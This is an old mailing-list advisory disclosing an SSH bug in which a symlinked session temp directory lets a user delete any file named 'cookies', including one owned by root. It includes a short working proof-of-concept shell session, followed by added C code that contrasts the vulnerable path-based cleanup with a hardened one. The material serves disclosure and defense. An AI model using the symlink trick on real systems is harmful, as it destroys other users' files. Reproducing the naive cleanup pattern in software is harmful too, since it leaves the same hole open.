From: zen-parse@gmx.net
Date: Mon Jun 04 2001 - 05:14:29 CDT


    SSH allows deletion of other users' files.

    You can delete any file on the filesystem you want...

    as long as it's called cookies.

    Not really a very useful bug, but could cause annoyances to
    people who actually like their cookies.


    sample exploit:-

     [root@clarity /root]# touch /cookies;ls /cookies
     [root@clarity /root]# ssh zen@localhost
     zen@localhost's password:
     Last login: Mon Jun 4 20:22:39 2001 from localhost.local
     Linux clarity 2.2.19-7.0.1 #1 Tue Apr 10 01:56:16 EDT 2001 i686 unknown
     [zen@clarity zen]$ rm -r /tmp/ssh-XXW9hNY9/; ln -s / /tmp/ssh-XXW9hNY9
     [zen@clarity zen]$ logout
     Connection to localhost closed.
     [root@clarity /root]# ls /cookies
     /bin/ls: /cookies: No such file or directory
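
The transcript above shows a cleanup step at logout removing `cookies` through a symlink that replaced the session's temporary directory. As an added example (not part of the original post and not sshd's code), this C sketch contrasts an assumed path-based cleanup with a version that refuses a symlinked directory and unlinks relative to a checked descriptor. The function names and the sandbox layout under `/tmp` are hypothetical.

```c
#define _POSIX_C_SOURCE 200809L
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Assumed shape of the flawed cleanup: build a path and unlink it as-is. */
int naive_cleanup(const char *dir, const char *name)
{
    char path[4096];
    snprintf(path, sizeof path, "%s/%s", dir, name);
    return unlink(path);            /* resolves a symlink planted at dir */
}

/* Hardened: refuse a symlinked dir, check its owner, unlink via the fd. */
int safe_cleanup(const char *dir, const char *name, uid_t owner)
{
    struct stat st;
    int rc = -1;
    int dfd = open(dir, O_RDONLY | O_DIRECTORY | O_NOFOLLOW | O_CLOEXEC);
    if (dfd < 0) return -1;         /* open fails when dir is a symlink */
    if (fstat(dfd, &st) == 0 && st.st_uid == owner)
        rc = unlinkat(dfd, name, 0); /* relative to the directory we checked */
    close(dfd);
    return rc;
}

/* Constructed sandbox: <base>/real/cookies and <base>/lnk -> real. Returns 1
 * if real/cookies survives the cleanup, 0 if deleted, -1 on setup error. */
int cookie_survives(int use_safe, int via_symlink)
{
    char base[] = "/tmp/cleanup-demo-XXXXXX", real[64], file[128], lnk[64];
    if (!mkdtemp(base)) return -1;
    snprintf(real, sizeof real, "%s/real", base);
    snprintf(file, sizeof file, "%s/cookies", real);
    snprintf(lnk, sizeof lnk, "%s/lnk", base);
    int fd = mkdir(real, 0700) == 0 ? open(file, O_CREAT | O_WRONLY, 0600) : -1;
    if (fd < 0 || close(fd) != 0 || symlink(real, lnk) != 0) return -1;
    const char *dir = via_symlink ? lnk : real;
    if (use_safe) safe_cleanup(dir, "cookies", getuid());
    else naive_cleanup(dir, "cookies");
    return access(file, F_OK) == 0;
}

int main(void)
{
    printf("naive=%d safe=%d\n", cookie_survives(0, 1), cookie_survives(1, 1));
    return 0;
}
```

Running the cleanup with the session user's privileges rather than root's would also limit what a redirected delete can reach.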